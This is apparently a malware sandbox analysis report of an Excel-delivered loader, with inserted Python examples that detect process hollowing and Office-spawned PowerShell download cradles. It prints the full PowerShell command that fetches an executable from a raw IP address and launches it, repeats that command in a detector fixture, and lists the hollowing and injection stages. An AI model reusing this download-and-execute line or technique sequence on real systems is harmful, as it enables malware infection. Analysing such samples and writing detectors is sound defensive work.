            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03304BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03304BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033A5BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0330B390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032E1B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032E1B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03302397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0339138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FEB9A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FEB9A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0338D380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D4B94 mov edi, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0330138B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0330138B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0330138B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0337EB8A mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0337EB8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0337EB8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0337EB8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D1BE9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FDBE9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033003E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033003E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033003E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033003E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033003E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033003E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033823E3 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033823E3 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033823E3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033053C5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033553CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033553CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D4A20 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D4A20 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03391229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D8239 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D8239 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D8239 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FB236 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FB236 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FB236 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FB236 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FB236 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FB236 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03314A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03314A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032E8A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0339AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0339AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032F3A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032DAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032DAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D5210 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0331927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0338B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0338B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033A8A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03315A69 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03315A69 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03315A69 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03364257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03391A5F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0339EA55 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03395A4F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03395A4F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03395A4F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03395A4F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0330FAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D1AA0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033012BD mov esi, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033012BD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033012BD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03305AA0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_03305AA0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_032EAAB0 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_0339129A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_0330D294 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_0330DA88 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_0339B2E8 mov eax, dword ptr fs:[00000030h] (x4)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_03302AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_03394AEF mov eax, dword ptr fs:[00000030h] (x14)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_032D3ACA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_033A8ADD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_032D5AC0 mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_032D12D4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_03302ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_0330513A mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_032F4120 mov eax, dword ptr fs:[00000030h] (x4)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_032F4120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_032D3138 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_032D9100 mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_032E0100 mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_032DC962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_0339E962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_032DB171 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_033A8966 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_03391951 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_032FB944 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_032D395E mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_033551BE mov eax, dword ptr fs:[00000030h] (x4)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_033099BC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_033061A0 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_032F99BF mov ecx, dword ptr fs:[00000030h] (x8)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_032F99BF mov eax, dword ptr fs:[00000030h] (x4)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_033569A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_033949A4 mov eax, dword ptr fs:[00000030h] (x4)
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_03302990 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_03304190 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_032FC182 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 19_2_0339A189 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\eVJOpc.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\wlanext.exe | Process queried: DebugPort
Source: C:\Users\Public\eVJOpc.exe | Code function: 9_2_00409B50 LdrLoadDll,

HIPS / PFW / Operating System Protection Evasion:

Sample uses process hollowing technique
Source: C:\Users\Public\eVJOpc.exe | Section unmapped: C:\Windows\SysWOW64\wlanext.exe base address: DA0000
Maps a DLL or memory area into another process
Source: C:\Users\Public\eVJOpc.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\Public\eVJOpc.exe | Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write (x2)
Injects a PE file into a foreign process
Source: C:\Users\Public\eVJOpc.exe | Memory written: C:\Users\Public\eVJOpc.exe base: 400000 value starts with: 4D5A
Queues an APC in another process (thread injection)
Source: C:\Users\Public\eVJOpc.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\Public\eVJOpc.exe | Thread register set: target process: 3352
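The four signatures above (the wlanext.exe image section unmapped, an MZ header written at another process's image base, a thread context rewritten, an APC queued) are the stages of process hollowing seen from the monitor's side. The Python below is an added example, not Joe Sandbox code and not taken from the sample: it scores a per-process API trace for that ordered sequence. The ApiEvent record, the stage table and both traces are assumptions of this example; the first trace is constructed to mirror the report's evidence, the second imitates a debugger patching a breakpoint and must not match.

```python
"""Recognise the process-hollowing API sequence the signatures above describe.

Added example, not Joe Sandbox code. The ApiEvent record, the stage names and the
two traces are constructed for illustration; they imitate the report's evidence
(image section unmapped in the target, an MZ header written at the image base,
thread context set, thread resumed) rather than replaying the real sample.
"""
from dataclasses import dataclass
from typing import Iterable


@dataclass(frozen=True)
class ApiEvent:
    pid: int          # process making the call
    api: str          # API name as an API monitor or ETW provider would report it
    target_pid: int   # process the handle refers to (equal to pid for self-calls)
    detail: str = ""  # first bytes written, creation flags, base address


# Classic hollowing runs in this order: create suspended, unmap the original image,
# write a PE at the image base, point a thread at the new entry, resume it.
STAGES: tuple = (
    ("create_suspended", lambda e: e.api.startswith("CreateProcess") and "CREATE_SUSPENDED" in e.detail),
    ("unmap_image",      lambda e: e.api in {"NtUnmapViewOfSection", "ZwUnmapViewOfSection"}),
    ("write_pe_header",  lambda e: e.api in {"WriteProcessMemory", "NtWriteVirtualMemory"}
                                   and e.detail.upper().startswith("4D5A")),
    ("hijack_thread",    lambda e: e.api in {"SetThreadContext", "NtSetContextThread",
                                             "QueueUserAPC", "NtQueueApcThread"}),
    ("resume",           lambda e: e.api in {"ResumeThread", "NtResumeThread"}),
)


def hollowing_stages(events: Iterable[ApiEvent], source_pid: int, target_pid: int) -> list:
    """Stages observed from source_pid against a *different* target_pid, in first-seen order."""
    seen = []
    for e in events:
        if e.pid != source_pid or e.target_pid != target_pid or e.target_pid == e.pid:
            continue
        for name, matches in STAGES:
            if name not in seen and matches(e):
                seen.append(name)
    return seen


def is_hollowing(events: Iterable[ApiEvent], source_pid: int, target_pid: int) -> bool:
    """Alert when the foreign image is unmapped or overwritten with a PE header and,
    after that, a thread of the target is redirected or resumed."""
    s = hollowing_stages(list(events), source_pid, target_pid)
    replace_idx = [s.index(n) for n in ("unmap_image", "write_pe_header") if n in s]
    exec_idx = [s.index(n) for n in ("hijack_thread", "resume") if n in s]
    return bool(replace_idx) and bool(exec_idx) and min(replace_idx) < max(exec_idx)


# Constructed trace mirroring the report: dropper (pid 4001) hollows a suspended wlanext.exe (pid 4002).
MALICIOUS_TRACE = [
    ApiEvent(4001, "CreateProcessW", 4002, "CREATE_SUSPENDED image=C:\\Windows\\SysWOW64\\wlanext.exe"),
    ApiEvent(4001, "NtUnmapViewOfSection", 4002, "base=0xDA0000"),
    ApiEvent(4001, "NtWriteVirtualMemory", 4002, "4D5A9000..."),   # PE header at the image base
    ApiEvent(4001, "NtWriteVirtualMemory", 4002, "E8000000..."),   # remaining sections
    ApiEvent(4001, "NtSetContextThread", 4002, "eip=new entry point"),
    ApiEvent(4001, "NtResumeThread", 4002, ""),
]

# Constructed benign trace: a debugger (pid 5001) writes an int3 and steps its debuggee (pid 5002).
DEBUGGER_TRACE = [
    ApiEvent(5001, "NtWriteVirtualMemory", 5002, "CC"),
    ApiEvent(5001, "NtSetContextThread", 5002, "eip=breakpoint+1"),
    ApiEvent(5001, "NtResumeThread", 5002, ""),
]

if __name__ == "__main__":
    print("malicious:", hollowing_stages(MALICIOUS_TRACE, 4001, 4002), is_hollowing(MALICIOUS_TRACE, 4001, 4002))
    print("debugger :", hollowing_stages(DEBUGGER_TRACE, 5001, 5002), is_hollowing(DEBUGGER_TRACE, 5001, 5002))
```

Requiring an image-replacement stage (unmap, or a write that begins with MZ) before the redirect or resume stage against the same foreign process is what keeps debuggers, crash handlers and installers that also call SetThreadContext or WriteProcessMemory from matching.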
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe
Source: Yara match | File source: app.xml, type: SAMPLE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\explorer.exe 'C:\Windows\system32\explorer.exe' C:\Users\Public\eVJOpc.exe
Source: C:\Users\Public\eVJOpc.exe | Process created: C:\Users\Public\eVJOpc.exe 'C:\Users\Public\eVJOpc.exe'
Source: C:\Windows\SysWOW64\wlanext.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\eVJOpc.exe'
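The process-creation lines above record the whole delivery chain: EXCEL.EXE launches PowerShell, which fetches new3.exe over plain HTTP, writes it under $env:public and hands it to explorer.exe; the hollowed wlanext.exe later removes the dropper with cmd.exe /c del. The Python below is an added example, not code from Joe Sandbox or from the sample, showing how a single process-creation event can be scored for that chain. The ProcEvent record, the image and cmdlet lists, the severity rules and the benign comparison event are assumptions of this example; the first command line is the one the report shows.

```python
"""Flag an Office-spawned PowerShell download-and-execute cradle from a process-creation event.

Added example, not Joe Sandbox code. The event record, the match lists and the
severity rules are assumptions of this example; the first sample event reproduces
the command line in the report, the second is a constructed benign comparison.
"""
import re
from dataclasses import dataclass, field

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe", "mspub.exe"}
SHELL_IMAGES = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Download primitives that commonly appear in one-line cradles.
DOWNLOAD_RE = re.compile(r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|start-bitstransfer|\bcurl\b|\bwget\b", re.I)
URL_RE = re.compile(r"https?://[^\s'\";]+", re.I)
OUTFILE_RE = re.compile(r"-outfile\s+['\"]?([^\s;'\"]+)", re.I)
# Locations every local user can write to and where a fresh executable is rarely legitimate.
USER_WRITABLE_RE = re.compile(r"\$env:public|%public%|\\users\\public\\|\$env:temp|%temp%|\\appdata\\local\\temp\\", re.I)


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


@dataclass
class Verdict:
    severity: str                      # "none", "medium" or "high"
    findings: list = field(default_factory=list)
    urls: list = field(default_factory=list)
    drop_path: str = ""


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyse(ev: ProcEvent) -> Verdict:
    """Score one process-creation event for the Office -> shell -> download -> execute chain."""
    v = Verdict("none")
    cl = ev.command_line
    if _basename(ev.parent_image) in OFFICE_IMAGES and _basename(ev.image) in SHELL_IMAGES:
        v.findings.append("office_spawns_shell")
    if DOWNLOAD_RE.search(cl):
        v.findings.append("download_cradle")
        v.urls = URL_RE.findall(cl)
    m = OUTFILE_RE.search(cl)
    if m:
        v.drop_path = m.group(1)
        if USER_WRITABLE_RE.search(v.drop_path):
            v.findings.append("drops_to_user_writable")
        # The dropped path reappearing after the download is the "and execute" half of the cradle.
        if cl.lower().count(v.drop_path.lower()) >= 2:
            v.findings.append("executes_dropped_file")
    if "download_cradle" in v.findings and (
        "office_spawns_shell" in v.findings or "executes_dropped_file" in v.findings
    ):
        v.severity = "high"
    elif "office_spawns_shell" in v.findings:
        v.severity = "medium"          # Office spawning a shell is worth a look on its own
    return v


# Constructed events: the first carries the command line from the report, the second is benign.
SAMPLE_EVENTS = [
    ProcEvent(
        parent_image=r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE",
        image=r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        command_line=r"'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe",
    ),
    ProcEvent(
        parent_image=r"C:\Windows\explorer.exe",
        image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        command_line=r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1",   # assumed benign admin script
    ),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        v = analyse(ev)
        print(f"{_basename(ev.parent_image)} -> {_basename(ev.image)}: {v.severity} {v.findings} {v.urls} {v.drop_path}")
```

Note that the parent is the 32-bit Office16 build, so the child is the SysWOW64 PowerShell even though the command line names System32; match on the basename, not the full path, or the WOW64 redirection will hide the event.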
Source: explorer.exe, 00000007.00000002.561411411.0000000000FA0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.375021132.00000000011E0000.00000002.00020000.sdmp | Binary or memory string: Program Manager
Source: explorer.exe, 0000000A.00000002.559932711.0000000000B68000.00000004.00000020.sdmp | Binary or memory string: Progman\Pr
Source: explorer.exe, 00000007.00000002.561411411.0000000000FA0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.375021132.00000000011E0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000002.561411411.0000000000FA0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.375021132.00000000011E0000.00000002.00020000.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000007.00000002.561411411.0000000000FA0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.375021132.00000000011E0000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
Source: explorer.exe, 0000000A.00000000.402916350.0000000008778000.00000004.00000001.sdmp | Binary or memory string: Shell_TrayWndh
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (x3)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation (x3)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation (x2)
